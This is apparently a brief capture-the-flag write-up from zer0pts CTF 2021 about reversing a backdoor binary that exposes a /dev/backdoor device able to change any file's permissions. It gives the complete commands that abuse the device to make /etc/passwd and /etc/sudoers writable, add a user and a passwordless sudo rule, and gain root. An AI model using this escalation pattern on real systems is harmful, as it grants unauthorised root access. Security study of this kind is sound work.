zer0pts CTF 2021
reversing
We were given a backdoor binary. At first glance we can see some CUSE functions. It is easy to analyze that creates character device /dev/backdoor
and the device changes file permission according to input b4ckd00r:<file path>:<permission>
The remained is the shell things. We want to see contents of /root
with arbitrary file read / write (because we can change arbitrary file's permission to 777).
To see in the /root
, we should become the root user. The easist way to be root is using su
. So our purpose is to execute su
or sudo su
.
We can solve this problem with the following commands:
echo 'b4ckd00r:/etc/passwd:511' > /dev/backdoor
echo tako:x:1000:1000:tako:/home:/bin/bash >> /etc/passwd
echo 'b4ckd00r:/etc/sudoers:551' > /dev/backdoor
echo 'ALL ALL=NOPASSWD: ALL' >> /etc/sudoers
echo 'b4ckd00r:/etc/sudoers:288' > /dev/backdoor
sudo /bin/su
Then done